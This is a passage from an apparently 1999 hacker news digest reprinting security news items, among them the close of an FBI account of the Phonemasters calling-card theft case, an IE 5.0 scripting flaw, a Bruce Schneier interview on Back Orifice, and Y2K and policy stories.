Sprint's computer system and downloaded about 850 Sprint calling-card codes. He then transferred those codes to a man in Canada. The codes would allow anyone who purchased them to place free international phone calls. Morris would later learn that a contact in Canada paid Cantrell $2 apiece for each code, court records show. The Phonemasters most likely did not know -- or care -- where the codes ended up, but the FBI traced them and found some ended up in the hands of a Sicilian Mafia operative in Switzerland. On Jan. 23, while probing a U S West telephone database, Cantrell, Bosanac, Lindsley and others stumbled over a list of telephone lines that were being monitored by law enforcement. On a lark, they decided to call one of the people -- a suspected drug dealer, says Morris -- and let him know his pager was being traced by the police. On Jan. 27, the group was clearly feeling paranoia about being caught, prompting Lindsley to tell his accomplices to pull as many Sprint codes as quickly as they could. Cantrell began to have reservations. "What if I stopped before all of y'all?" Cantrell asked Lindsley. "Would you applaud my efforts?" "No," said Lindsley. "I don't think there's any reason to stop. What are you worried about?" "Uh, I'm not worried about anything. I'm just saying, uhm. There might ... there might come a time here where I don't have time for this." He added a little later: "I, you know, really like it. But, I don't know, I just ... Eventually, I don't see myself doing a lot of illegal things." Lindsley continued to prod Cantrell to speed up the download of stolen codes by spending more time online and using two phones. "I'm telling you, you run two lines around the clock," Lindsley said. "You can't run them around the clock," said Cantrell. "Why not?" "Oh, come on. I think that's pushing it too hard." "I think you just got a weak stomach there, boy." Tension rises By late February, things began to get tense. One of Cantrell's hacker friends informed him that his number had shown up in a database of phone numbers being monitored by the FBI. In all the excitement of burglarizing databases and rerouting phone calls, the Phonemasters had neglected to check their own phone lines for any signs that law enforcement might be listening in. Morris hastily arranged for an FBI raid. On Feb. 22, 1995, agents raided Cantrell's home, Lindsley's college dorm room, and burst into Bosanac's bedroom in San Diego. For Morris, the climactic raid was only the start of a long battle to bring the hackers to justice. Because of the complicated nature of his evidence gathering, it took him more than two years to compile the most salient portions of the wiretap transcripts and data-tap evidence. "All the documents and tapes from this case could fill a 20-by-20 room," Morris explains. "And at the time, I was the only computer investigator for all of Texas." In the meantime, as federal prosecutors slowly geared up for a trial, Cantrell tried to get on with his life. "I spent the first few weeks after the raid being paranoid and wondering what would happen," he says. Occasionally, Morris and other agents would call him, asking questions about some of the systems he had hacked. By the summer of 1995, at the urging of his mother, Cantrell started attending church again. He scored the first in a string of professional computing jobs, doing systems-administration work for a company called Lee Datamail in Dallas. He neglected to tell his employers about the FBI case. "It's been mental torture for the last four years, not knowing," says Cantrell. "Can I go to school, move to another state? That kind of thing messes with your head." Over time, Cantrell says he had come to seriously regret what he had done and the $9,000 he says he made from selling codes wasn't worth the trouble. "Looking back, it was all crazy. It was an obsession. I wanted to see how much I could conquer and a little power went to my head." Cantrell notes that he has since tried to make amends, even helping the phone companies plug their security holes and helping the FBI gather more information on some of the group's members who haven't yet been apprehended. The matter finally seemed near conclusion this March when Morris was able to play "a couple of choice tapes" in separate meetings with Cantrell, Bosanac and Lindsley. Afterward, all three agreed to plea guilty to federal charges of one count of theft and possession of unauthorized calling-card numbers and one count of unauthorized access to computer systems. Chief Judge Jerry Buchmeyer ordered a presentencing investigation. During a hearing on the matter, Lindsley's attorney tried to argue that the FBI had wildly overstated the $1.85 million in losses that her client's hacking had allegedly caused. But in the end, Judge Buchmeyer rejected the argument and sentenced him to 41 months in prison. Bosanac, in the meantime, has asked that his sentencing hearing be moved to San Diego, where he lives. As for Cantrell, Judge Buchmeyer lauded his "acceptance of guilt." He could have been sentenced to three years in federal prison; instead he was given two. He reports to federal prison in January of next year. Morris, meanwhile, has used his data-tap method in several other cases; he also travels around the country and the world advising law-enforcement agencies on how to conduct state-of-the-art investigations of hacker crimes. @HWA 52.0 INDIA RESPONDS TO Y2K ACCUSATIONS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 2nd October 1999 on 2:45 pm CET Indian firms have done more than $2 billion worth of coding work to protect old computers from the Y2K problem, but accusations are made by some that India and Israel appear to be the "most likely sources" of malicious code. Indian officials yesterday reacted to these claims speaking of it as a ridiculous suggestion. Indian reaction http://www.wired.com/news/news/politics/story/22041.html India: Code-Smuggling? Absurd Reuters 11:45 a.m. 1.Oct.99.PDT Indian officials Friday slammed as ridiculous a suggestion by US officials that Indian Y2K (Year 2000) software firms could have been used to smuggle in computer codes aimed at threatening Washington's security. Michael Vatis, the top cyber cop in the Federal Bureau of Investigation, told Reuters Thursday that malicious code changes under the guise of Y2K modifications had begun to surface in some US work undertaken by foreign contractors. The claim signaled possible economic and security threats. Vatis, who heads the National Infrastructure Protection Center (NIPC), gave no details. But Terrill Maynard, a Central Intelligence Agency officer assigned to the NIPC, said in a recent article that India and Israel appeared to be the "most likely sources" of malicious code. The article appeared in the June issue of Infrastructure Protection Digest. "I think this is an utterly ridiculous assertion ... without, as far as I can see, any basis whatsoever," said Montek Singh Ahluwalia, chairman of the Indian government's Y2K Action Force. "I have no idea if this report is factually correct and if indeed a responsible officer has made what appears to be an irresponsible statement," Ahluwalia told Reuters. He said the Indian government had not received any official communication to suggest wrongdoing by Indian firms or agencies. The CIA declined to comment on Maynard's article. Referring to it, Vatis said: "This is our effort to put out in the public information that hopefully can be useful to people." Indian firms have done more than $2 billion worth of coding work to protect old computers whose date-fields denoted years only by the last two digits. Unless rectified, such computers can cause valuable data crashes when the year 2000 dawns. India and Israel have had differences with the United States on security matters, particularly on nuclear policy. Dewang Mehta, president of India's National Association of Software and Service Companies (NASSCOM), cited several reasons to dismiss suggestions Indian firms may be a security threat. He told Reuters that too much was at stake for India's booming software companies, which have used Y2K as a strategy to gain long-term clients. Besides, Indian firms did the bulk of Y2K work at US sites under client supervision, he added. "We cannot visualize that any moles have been planted. This is absurd. For us, too much is at stake," Mehta said. He said Indian firms had also carried out "regression testing," which was aimed at ensuring Y2K programming work did not hamper other software in client systems. Vatis said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road. This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, he said. Vatis said that so far "not a great deal" of Y2K-related tampering had turned up. But a US Senate panel said last week that long-term consequences of using foreign firms for Y2K work could include more espionage and reduced information security. Mehta said he heard during a recent visit to Israel a rumor about a computer virus designed to wipe out Y2K solutions. "I am afraid as only three months are left and many American systems are not compliant, this kind of global rumor-mongering is beginning to happen," he said. We all think we should guard ourselves against it. NASSCOM strongly condemns such rumors." Maynard noted Ireland, Pakistan, and the Philippines among nations whose firms did significant Y2K repair. He said they were "least likely" to harm US systems but did not rule out threat possibilities. Copyright 1999 Reuters Limited. @HWA 53.0 ANOTHER IE 5.0 HOLE EXPOSED ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 1st October 1999 on 10:20 am CET O swell, here's another Internet Explorer hole for you. The latest problem can occur through a download file link in HTML. The bogus link can open a path to your computer. This bug also bypasses firewalls to access PCs. Once again, turn of the scripting people! ZDNet report on it http://www.zdnet.com/zdnn/stories/news/0,4586,2344472,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- IE 5.0 security hole exposed By Peter Deegan, Help Channel September 30, 1999 8:02 AM PT URL: http://www.newslinx.com/ Every time you look there's another security breach found in Microsoft Internet Explorer 5.0. Like many of these problems there are no reports of it being used maliciously yet, but now that the details are out, the chances of someone making use of the information grows. This latest problem can occur through what appears to be a download file link on a Web page, newsgroup message or HTML e-mail message. The bogus download link can open a path to your computer, through which it's possible to read files on your computer. You don't need to click on the link to be affected because it possible to automatically activate the link when you view the Web page or e-mail message. The problem is in the Active Scripting component of Microsoft (Nasdaq:MSFT) Internet Explorer 5. Working behind a corporate firewall or proxy is no protection from this security hole. What can you do about it? There's no patch available for the problem, though Microsoft has issued a security alert and is working on the problem now. In the meantime you can protect yourself by switching off the Active Scripting component. In Internet Explorer 5, select Tools | Internet Options, then click on the Security tab. Select the Internet Zone, then click on the "Custom Level" button. Scroll down to the "Scripting" heading, find the "Active Scripting" entry and change it to "Disable." Click OK. Keep in mind, this temporary fix may do you more harm than good. Scripting is used by many Web sites, and it's possible that some service on a Web page won't work once you turn scripting off. The best example of this is the Windows Update option in IE5 itself; this is the easiest way to update the browser with security patches and other new features. So if you turn off Scripting in IE5 you won't be able to use the Windows option to get the update to fix Scripting. Catch 22! You could change the Scripting setting to "Prompt," which means you'll get a warning when you go to a Web page that has a scripting component. The problem with this is that the prompt gives you no indication of what the scripting will do so you're asked to make a decision with no information. While the risk in the short term of this problem is relatively low, you can switch off scripting if you're concerned -- but keep in mind the consequences. Remember to turn scripting back on when using Tools | Windows Update to check for an update. Let's hope the security patch for this problem arrives soon. @HWA 54.0 TELECOM INDUSTRY DECRIES DIGITAL WIRETAP DEADLINE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 1st October 1999 on 9:50 am CET Key members of the U.S. telecommunications industry complained this week that a government deadline for compliance with a new digital wiretapping law is "unrealistic." Matthew Flanigan, president of the Telecommunications Industry Association (TIA), warned that "Calea compliance involves one of the most complicated sets of features ever developed by manufacturers." To comply, Flanigan said, manufacturers must develop software interfaces for hundreds of network elements without bringing down telecom networks. Full story http://www.eet.com/story/OEG19990929S0022 Telecom industry decries digital wiretap deadline By George Leopold EE Times (09/29/99, 2:24 p.m. EDT) WASHINGTON — Key members of the U.S. telecommunications industry complained this week that a government deadline for compliance with a new digital wiretapping law is "unrealistic." While praising the Federal Communications Commission (FCC) for finally issuing guidelines to implement the controversial wiretap law — the Communications Assistance for Law Enforcement Act (Calea) — a trade group here charged with developing standards said a Sept. 30, 2001, deadline for compliance is too soon. Matthew Flanigan, president of the Telecommunications Industry Association (TIA), warned that "Calea compliance involves one of the most complicated sets of features ever developed by manufacturers." The FCC decision "will only add to the complexity and difficulty," he said. To comply, Flanigan said, manufacturers must develop software interfaces for hundreds of network elements without bringing down telecom networks. In issuing its final order earlier this week, the FCC designated the industry group as the standards-setting body for converting myriad legal decisions about the wiretap law into technical standards needed by manufacturers to comply with the 1994 law. @HWA 55.0 FED COMPUTER SECURITY BILL HAS STRONG SUPPORT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 1st October 1999 on 9:25 am CET A house bill aimed at beefing up computer security in civilian federal agencies received a broad endorsement from government and high-tech industry leaders today. Not only would H.R. 2413, The Computer Security Enhancement Act of 1999, provide much needed security guidance to non-military federal agencies, it could help beef-up private-sector computer security by providing the public with a list of government-approved security devices, National Institute of Standards and Technology (NIST) Director Raymond Kammer said yesterday. The legislation appears to have strong support in the Subcommittee on Technology after a hearing on the matter yesterday. Newsbytes http://www.newsbytes.com/pubNews/99/137105.html Fed Computer Security Bill Has Strong Support By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 30 Sep 1999, 3:56 PM CST A house bill aimed at beefing up computer security in civilian federal agencies received a broad endorsement from government and high-tech industry leaders today. Not only would H.R. 2413, The Computer Security Enhancement Act of 1999, provide much needed security guidance to non-military federal agencies, it could help beef-up private-sector computer security by providing the public with a list of government-approved security devices, National Institute of Standards and Technology (NIST) Director Raymond Kammer said today. Kammer spoke at a hearing on H.R. 2413 held by the House Science Committee's Subcommittee on Technology. The legislation appears to have strong support in the Subcommittee. "Despite the money, manpower and management priority we've exerted on the Y2K problem, I believe a lack of adequate computer security protection in our federal agencies has the potential to dwarf the millennium bug in scope and magnitude," Subcommittee Chairwoman Constance Morella, R-Md., said in prepared remarks today. Among other things, H.R. 2413 would require NIST to serve as a computer security consultant for other federal agencies. In that role NIST would advise agencies on what "off-the-shelf" computer security products met with the government's approval. NIST would provide that list of approved products to the public as well. The bill also requires the Under Secretary of Commerce to establish a "clearinghouse of information" on computer security threats and to make that list available to the public. If passed, the bill will "get civilian agencies to pay more attention to information security," said Information Technology Association of America President Harris Miller after today's hearing. In addition to its computer security provisions, the bill also establishes a new, NIST-administered computer science fellowship program for students studying computer security. Reported by Newsbytes.com, http://www.newsbytes.com . 15:56 CST @HWA 56.0 JUSTICE DEPT. TO FUND ANTIHACKING CAMPAIGN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 1st October 1999 on 9:15 am CET In March, Cybercitizen Partnership was announced, an awareness campaign coordinated by the Information Technology Association of America. The US Justice Department will provide $300,000 funding of the Cybercitizen Partnership and so, according to this article, will assume the unusual role of helping to educate budding Web users about how to be responsible, law-abiding surfers. Haleluja http://www.thestandard.net/articles/display/0,1449,6711,00.html?home.tf Justice Dept. Funds Antihacking Campaign By Keith Perine WASHINGTON – The Justice Department is trying to save children before they turn into hackers. With its $300,000 funding of the Cybercitizen Partnership, an awareness campaign coordinated by the Information Technology Association of America, the Justice Department assumes the unusual role of helping to educate budding Web users about how to be responsible, law-abiding surfers. The Cybercitizen Partnership, announced in March, is a joint Justice-ITAA effort aimed at protecting the country's Internet infrastructure from outlaw hackers and other criminals. Faced with a security breach, law enforcement officials don't know at first if they're confronting a foreign terrorist, a college student or a couple of sixth-graders who are having some fun with Dad's computer. But an ITAA official said that, upon investigation, a surprising number of cases involve child hackers. The association says that information technology makes up about 6 percent of the global gross domestic product – some $1.8 trillion of electronic infrastructure that needs to be protected against disgruntled former employees, corporate spies and juvenile delinquents who like to pull pranks. Figuring that it's too late to reform terrorists and spies, the ITAA decided to concentrate on the kids. The campaign, which debuts in January, will initially target children 12 and under, aiming to teach them proper online behavior and to instill a healthy disdain for hacking. The association wants to "help weed out some of the less meaningful system violations by curious children so that law enforcement can focus on the true criminals," says ITAA President Harris Miller. The cash infusion from the Justice Department is in keeping with a long tradition of government-sponsored public education campaigns, from the Interior Department's Smokey the Bear messages against forest fires to the Drug Enforcement Administration's "Just Say No" war on drugs. Miller says the campaign could be expanded to educate kids about other aspects of proper Internet etiquette, such as warning them against sending spam – for kids, the modern-day equivalent of prank telephone calls – or visiting Web sites with adult content. The main focus of the campaign, however, will be to "send the message that hacking isn't cute, clever or funny." In addition to the funding from Justice, the ITAA also plans to pass the hat among its own membership, a who's-who list of the high-tech industry that includes Microsoft (MSFT) , America Online (AOL) and IBM (IBM) . The association will also seek funds from foundations and possibly from private individuals. The association has sent out a request to several public relations companies for ideas on how to run the campaign, which might include television and Internet advertising, brochures and even visits to schools. One possibility under consideration: the creation of a mascot, like the famous McGruff crime dog, to pass the message along in a friendly manner. @HWA 57.0 COURT TO REVISIT CRYPTO RULING ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 1st October 1999 on 9:01 am CET A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government restrictions on the export of encryption technology. The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court ruling. In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts to distribute encryption software. Read more http://news.cnet.com/news/0-1005-200-424043.html?tag=st.ne.1002.bgif.1005-200-424043 Court to revisit encryption ruling By Bloomberg News Special to CNET News.com September 30, 1999, 1:30 p.m. PT SAN FRANCISCO--A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government restrictions on the export of encryption technology. The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court ruling. That indicates that a majority of the active 9th Circuit judges have reservations about the opinion or feel the encryption issue is significant enough to be revisited. In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts to distribute encryption software. Many companies, such as Network Associates, have been prevented by U.S. law from selling data-scrambling technology overseas. Earlier this month, it was reported that the Clinton administration is easing restrictions on data-scrambling technology, clearing the way for Network Associates and other companies to sell the hardest-to-crack encryption technology. Copyright 1999, Bloomberg L.P. All Rights Reserved. @HWA 58.0 DRAM ROBBERIES ~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 1st October 1999 on 8:40 am CET Dane-Elec (UK) warned fellow memory distributors to keep DRAM under surveillance following a robbery at their warehouse. The Surrey-based distributor said it was broken into at 2am yesterday morning. But the robbers were disturbed by a security guard and got away with less kit than they intended. 128MB and 64MB modules were stolen. Though the value wasn't disclosed, the company said it was small, and less than a tenth of the company’s stock. Word on the street is that this could be anything between £1 million and £3 million. The Register http://www.theregister.co.uk/ @HWA 59.0 DON'T BLAME BO FOR SECURITY PROBLEMS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Thursday 30th September 1999 on 9:30 am CET CNN spoke to Bruce Schneier about the BackOrifice remote administration tool. According to him, "Back Orifice will be used by lots of unethical people to do all sorts of unethical things, which is not good." But he also mentions some other things people should take to heart, programs as pcanywhere are as much "evil hacking tools" as BO. Microsoft responds to security threats only if they are demonstrated. Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice and suddenly they take the vulnerability seriously. CNN http://cnn.com/TECH/computing/9909/29/back.orifice.idg/index.html Don't blame Back Orifice for security problems September 29, 1999 Web posted at: 10:50 a.m. EDT (1450 GMT) by Ann Harrison (IDG) -- BackOrifice is a remote administration tool for Microsoft Windows and, as Bruce Schneier, chief technology officer at San Jose-based managed security services firm Counterpane Internet Security Inc. (link below), points out, "one of the coolest hacking tools ever developed." Computerworld reporter Ann Harrison spoke with him recently about the tool, which he insists has gotten an undeservedly bad reputation. Back Orifice 2000 (BO2K) is free, open source and available at www.bo2k.com (link below). Q: How does BO2K work? A: There are two parts: a client and a server. The server is installed on the target machine. The client, residing on another machine anywhere on the Internet, can now take control of the server. This is actually a legitimate requirement. Perfectly respectable programs, like pcAnywhere or Microsoft Systems Management Server [SMS], do the same thing. They allow a network administrator to remotely troubleshoot a computer. If the server is installed on a computer without the knowledge or consent of its owner, the client can effectively "own" the victim's PC. Q: Why has BO2K acquired a reputation as only a hacker's tool? A: Back Orifice's difference is primarily marketing spin. Since it was written by hackers, it is evil. That's wrong; pcAnywhere is just as much an evil hacking tool as Back Orifice. Not only can the client perform normal administration functions on the server's computer -- upload and download files, delete files, run programs, change configurations, take control of the keyboard and mouse, see whatever is on the server's screen -- but it can also do more subversive things: reboot the computer, display arbitrary dialog boxes, turn the microphone or camera on and off, capture keystrokes and passwords. And there is an extensible plug-in language for others to write modules. Q: How does BO2K run in stealth mode? A: Unless the server's owner is knowledgeable (and suspicious), he will never know that Back Orifice is running on his computer. Other remote administration tools, even SMS, also have stealth modes. Back Orifice is just better at it. Because Back Orifice is configurable, because it can be downloaded in source form and then recompiled to look different... I doubt that all variants will ever be discovered. BO2K's slogan is "show some control," and many will take that imperative seriously. Back Orifice will be used by lots of unethical people to do all sorts of unethical things. And that's not good. Q: Back Orifice can't do anything until the server portion is installed on some victim's computer, right? A: Yes. This means that the victim has to commit a security faux pas before anything else can happen. Not that this is very hard -- lots of people network their computers to the Internet without adequate protection. Still, if the victim is sufficiently vigilant, he can never be attacked by Back Orifice. Q: What about Microsoft? A: One of the reasons Back Orifice is so nasty is that Microsoft doesn't design its operating systems to be secure. It never has. In Unix, an attacker would first have to get root privileges. Not in Windows. There's no such thing as limited privileges or administrator privileges or root privileges. This might have made some sense in the age of isolated desktop computers. But on the Internet, this is absurd. There are provisions to make Windows NT a very secure operating system, such as privilege levels in separate user accounts, file permissions and kernel object access control lists. You have to make 300-plus security checks and modifications to Windows NT to make it secure. Microsoft refuses to ship the [operating system] in that condition. Malicious remote administration tools are a major security risk. What Back Orifice has done is made mainstream computer users aware of the danger. There are certainly other similar tools in thehacker world -- one, called BackDoor-G, has recently been discovered -- some developed with much more sinister purposes in mind. Microsoft responds to security threats only if they are demonstrated. Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice and suddenly they take the vulnerability seriously. @HWA 60.0 WHY HACKING CONTESTS ARE A BAD IDEA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Thursday 30th September 1999 on 9:15 am CET Ira Winkler responds in a commentary to the new trend to test an OS by encouraging people to hack into it. A nice overview of the "don'ts" and inaccuracy of such a manner of testing. Read more HTTP://www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2343174,00.html?chkpt=zdnnp1ms Why Hacking Contests Are a Bad Idea Contests that encourage people to hack are not a good way to test an OS. By Ira Winkler October 4, 1999 When ZDTV informed me of a hacker contest being sponsored by PC Week, I thought it was a joke. Yet after visiting the site, I'm not laughing. There are so many reasons why this test is a bad idea. Many people, however, might think that a hacker contest is the only way to thoroughly check the security of a system. The logic, as stated on the PC Week website, was to definitively determine which of the two operating systems is more secure: Windows NT or Unix. According to the stated logic, there is no better way to determine security than by having everyone in the world try to break into the systems. Of course, the less secure system would fall first. To make sure that PC Week attracted the best talent in the world to take part in this test, the contest organizers offered a $1,000 reward. To a layperson, this may make sense. There is much more to security than just the operating system. There are two basic methods for breaking into a computer. 1.Exploit problems built into the underlying operating system and applications. 2.Exploit problems with the way that administrators and users configure, manage, and use the system. To first assume that hacking tests are valid, the systems must be configured perfectly. That in itself is asking a lot. In Search of Security Then you have to assume that the applications that were used to provide the Web functionality are also secure. After all, you are asking to decide if Windows NT is a good platform-- not if Windows NT with a specific Web server application is secure. If there is an exploitation that compromises the server application, it doesn't mean that the operating system is the problem. The next problem is with the Unix/Linux side of the test. There are many different versions of Unix and Linux. Just because there might be a weakness in Red Hat Linux, for example, doesn't mean that all other versions of Linux have that weakness. Next you have to look at the goal of the test. If the goal is to have someone break into a site and manipulate the webpages, that is one issue. But what happens if someone takes the system down? A Denial of Service attack could be more devastating than if someone actually broke in and modified webpages. In theory a person who has broken into a system can do both, however taking a system down is bad enough. Probably what is most surprising is that the PC Week Linux system was "hacked" first. According to the rules of the "test," this means that Windows NT is more secure than Linux. I don't know any security professional who would buy that argument. And I doubt that Microsoft will now start telling people that NT is more secure than Linux, based on this "test." There are many other reasons, from a technical perspective, as to why this is a bad test. However I should reserve some space for the logistical perspective of using "hackers" to test security. Eyes on the Prize Although the contest organizers at PC Week probably believe that $1,000 is enough to attract the attention of the best hackers in the world, $1,000 is not nearly enough to attract the attention of the more competent hackers. Talented security people, whom PC Week expects to attract to the test, can earn as much as $2,000 a day in consulting rates. Additionally there have been other "hacker challenges." These challenges were set up in an unrealistic manner, and the way to collect the "prize" required more effort than it was worth. Past hacker challenges have discouraged the better hackers. Another issue is that you have to assume that everyone has heard about this test. Although there may have been some talk about the challenge on some online forums, this test has definitely not made the rounds. Probably the most serious of the problems is that there is no right way to define "The Most Secure Operating System." However, the most agreed-upon way to examine security is by looking at the source code of the operating system. Microsoft is not about to divulge the source code to PC Week for a detailed examination of Windows NT security. So, what is the most secure operating system? It is simply the system that you can maintain best. Even if you could identify the most secure operating system, it will only be secure as long as it is properly configured, maintained, and used. Therefore, the most potentially secure operating system is the one that you know best. For example, if your organization has administrators who are real NT experts, you would be a fool to use an unfamiliar operating system for no other reason than you think it is more secure. Likewise, people would be fools to turn away from Linux, because it was the first system hacked in the PC Week test. I have seen very secure NT websites, because they were well maintained. I have also seen very unsecure NT websites because they were poorly maintained. PC Week would better serve its readers by testing administrator training programs rather than operating systems. Postscript As the PC Week security test progresses, it continues to show why the test isn't the greatest idea. First there is an issue that I didn't want to point out in the original column. About a year ago, I helped ComputerWorld organize a test of firewalls that would have been similar in nature to this hacker challenge. One of the first issues we considered was that if we opened up the test to everyone, people might get bored with hacking the test system and turn their attention to ComputerWorld's operating systems. The people at ComputerWorld decided that this was a very real threat and decided against an open challenge. Now, a series of posts on the PC Week Security Forum openly recommend or encourage the hacking of the Ziff-Davis-owned site as an extension of this test. Whether or not people actually go after the Ziff-Davis site is one story, but a little forethought would have been wise. The second issue to consider is what as I stated in the original column, the system must be configured securely by the administrators before a test can be deemed valid. It appears that the Linux hack was a result of a cgi scripting program as well as an unapplied patch (or security fix). Both of these are configuration issues and the result of administration practices, not the underlying software. Again I would recommend that administrator training programs be tested, if you want a really useful security-related test. @HWA 61.0 NO $35 MILLION FOR DOE CYBER SECURITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 29th September 1999 on 8:55 pm CET The Senate yesterday passed an energy appropriations bill that omits $35 million requested by Energy Secretary Bill Richardson for increased computer security. Richardson, traveling overseas, issued a statement charging that Congress was withholding "important tools needed to implement security reform" that Congress itself had demanded and that now "it will be impossible to provide real-time cyber intrusion detection and protection for 70 Energy Department sites." Newsbytes http://www.newsbytes.com/pubNews/99/137008.html DOE Loses $35 Million for Cyber Security By Walter Pincus and Vernon Loeb, Washington Post WASHINGTON DC, U.S.A., 29 Sep 1999, 9:03 AM CST The Senate yesterday passed an energy appropriations bill that omits $35 million requested by Energy Secretary Bill Richardson for increased computer security. The money was eliminated despite months of heated debate over suspected Chinese espionage, during which leading Republicans accused the Clinton administration of foot-dragging on security. Richardson, traveling overseas, issued a statement charging that Congress was withholding "important tools needed to implement security reform" that Congress itself had demanded. Without the $35 million, Richardson said, "it will be impossible to provide real-time cyber intrusion detection and protection for 70 Energy Department sites." The money was eliminated by a House-Senate conference reconciling differences between the initial versions of the bill passed by the two chambers. A member of the conference committee, who requested anonymity, said the $35 million was eliminated because members "want to see management reform" before they approve a huge funding increase. The committee member noted that Richardson is developing a $450 million cyber security proposal for fiscal 2001. It would include money to replace all personal computers used in classified programs with machines that do not have floppy disk drives, and thus cannot easily be downloaded. Congress's action leaves the department with the $2 million it originally sought for computer security before suspected Chinese espionage came to dominate political debate in Washington last spring. Cyber security, in particular, became a major concern after it was discovered that the government's prime espionage suspect at the Los Alamos National Laboratory, Chinese American physicist Wen Ho Lee, had downloaded classified information to his unclassified computer. Lee, who denies passing secrets to China, was fired but has not been charged with any crime. Meanwhile, the Energy Department's director of counterintelligence, Edward J. Curran, acknowledged yesterday that he recommended his brother, a retired police detective, for a $70-an-hour temporary job reviewing counterintelligence operations at the department's three nuclear weapons laboratories. But he said the department's inspector general determined that his recommendation did not violate federal conflict-of-interest statutes. "I recommended my brother, yes, but he does not work directly for me," Curran said. Michael Curran, a veteran of 27 years as a detective for the Waterfront Commission of New York Harbor, has participated in a two-week counterintelligence inspection at Lawrence Livermore Laboratory National Laboratory in California and is now part of a nine-member team reviewing security at the Los Alamos lab in New Mexico. All told, he will work about six weeks this fall, Edward Curran said, and will participate in additional counterintelligence inspections at Energy Department facilities next year. Reported by Newbsytes.com, http://www.newsbytes.com 09:03 CST Reposted 11:14 CST @HWA 62.0 DOD SELLS NON Y2K COMPLIANT EQUIPMENT WITHOUT WARNING ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 29th September 1999 on 8:35 pm CET The Defense Department donated or sold hundreds of thousands of computers, medical devices and other electronic equipment to state and local agencies, hospitals and other public institutions that could fail to operate because of Year 2000 problems. The medical property included devices critical to health and safety, such as anesthesia apparatus, fetal heart monitors and X-ray equipment. Read more http://www.fcw.com/pubs/fcw/1999/0927/web-dod-09-28-99.html SEPTEMBER 28, 1999 . . . 16:54 EDT DOD resold non-Y2K compliant computers, medical devices BY DANIEL VERTON (dan_verton@fcw.com) The Defense Department donated or sold hundreds of thousands of computers, medical devices and other electronic equipment to state and local agencies, hospitals and other public institutions that could fail to operate because of Year 2000 problems. In a report released this week, the Pentagon's inspector general found that many of the 340,000 excess medical devices and 77,900 excess computer systems donated or sold by DOD between Oct. 1, 1998, and March 31, 1999, may not have been Year 2000-compliant and could fail to operate properly after Dec. 31. "The medical property included devices critical to health and safety, such as anesthesia apparatus, fetal heart monitors and X-ray equipment," the report stated. However, auditors admitted that the list of 340,000 medical devices also included many items that are not deemed critical to public health and safety and do not rely on date-dependent computer microchips. In one case, the Naval Medical Center in Portsmouth, Va., transferred 9,000 pieces of equipment to the Defense Reutilization and Marketing Service -- the DOD agency responsible for disbursing equipment that is no longer needed -- for sale or donation to other institutions without assessing any of them for potential Year 2000 problems. In fact, of the 9,000 items cited, 2,000 posed a high or medium health risk, the report stated. According to the IG, plans called for these items to be transferred or sold to the DOD Humanitarian Assistance Program, the Indian Health Service, state and local agencies and the general public. In addition to medical devices, the Defense Information Systems Agency and the Defense Logistics Agency sold or donated more than 77,900 pieces of computer equipment to various federal, state and local law enforcement agencies that also may be at risk of Year 2000 failures. "DISA did not notify recipients that equipment may not be Y2K compliant or provide a disclaimer that equipment was made available without warranty for fitness of use," the IG report stated. The equipment transferred to law enforcement agencies included various communications security and cryptologic devices, radio navigation equipment and electronic countermeasures equipment. In his response accompanying the report, Marvin Langston, DOD's deputy chief information officer, said the department agrees with the findings of the IG report and is changing the its Year 2000 Management Plan to address the disposal of Year 2000-sensitive equipment. "Because of the potential risk to the general public, this document also addresses biomedical equipment turned in to the Defense Reutilization and Marketing Service," Langston said. However, Rear Adm. E.R. Chamberlin, deputy director of DLA, which oversees the various DRMS facilities throughout DOD, said the IG report "exaggerates" the Year 2000 risks associated with excess and surplus equipment, particularly medical equipment. "We offer excess and surplus equipment on an 'as is, where is' basis, with no express or implied warranties for fitness of use," Chamberlin said. "DLA reviewed medical items [in the categories audited] and only .2 percent were found to have an embedded chip and none to be date-sensitive," he said. @HWA 63.0 HATE ON GOVERNMENT WEB SITE ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 29th September 1999 on 8:25 pm CET A Florida sheriff is using an official government web site to espouse his views on abortion, school prayer, and the "moral corruption" brought by various social groups and organizations. Because McDougall's message is posted on a site that is apparently taxpayer supported, his words have sparked debate about whether the message constitutes protected free speech or an illegal use of government property to express personal views. 